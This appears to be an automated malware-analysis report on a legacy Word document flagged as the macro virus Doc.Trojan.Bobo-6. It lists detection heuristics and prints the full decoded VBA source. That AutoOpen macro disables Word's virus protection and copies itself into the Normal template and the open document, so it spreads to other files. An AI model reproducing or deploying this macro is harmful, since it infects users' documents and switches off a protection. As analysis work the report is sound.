MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a legacy Word document containing VBA macros. The AutoOpen macro is designed to copy itself to the Normal template and the active document, which is a common technique for establishing persistence or ensuring the macro executes in future documents. The ClamAV detection 'Doc.Trojan.Bobo-6' further indicates malicious intent. No external network activity or specific payload delivery was observed in the provided evidence.
Heuristics 4
-
ClamAV: Doc.Trojan.Bobo-6 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Bobo-6
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1589 bytes |
SHA-256: e6f44a9e566031dbfc54ce4c9a588c7b91bbe0c0a84ea1bd7de979c9710ec0f9 |
|||
|
Detection
ClamAV:
Doc.Trojan.Bobo-6
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Modulo1"
Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro creada el 09/04/96 por osvald"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.NewMacros.AutoOpen"
Options.VirusProtection = False
If NormalTemplate.VBProject.Protection = False And ActiveDocument.VBProject.Protection = False Then
t = False
s = ActiveDocument.Path + "\" + ActiveDocument.Name
ss = NormalTemplate.Path + "\" + NormalTemplate.Name
For Each mhac In NormalTemplate.VBProject.VBComponents
If mhac.Name = "Modulo1" Then t = True
Next mhac
If t = False Then
Application.OrganizerCopy Source:=s, Destination _
:=ss, Name:="Modulo1", Object:=wdOrganizerObjectProjectItems
If Err.Number <> 0 Then
Exit Sub
End If
NormalTemplate.Save
If Err.Number <> 0 Then
Exit Sub
End If
End If
t = False
For Each mhac In ActiveDocument.VBProject.VBComponents
If mhac.Name = "Modulo1" Then t = True
Next mhac
If t = False Then Application.OrganizerCopy Source:=ss, Destination _
:=s, Name:="Modulo1", Object:=wdOrganizerObjectProjectItems
If Err.Number <> 0 Then
Exit Sub
End If
ActiveDocument.Save
If Err.Number <> 0 Then
Exit Sub
End If
End If
End
End Sub
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.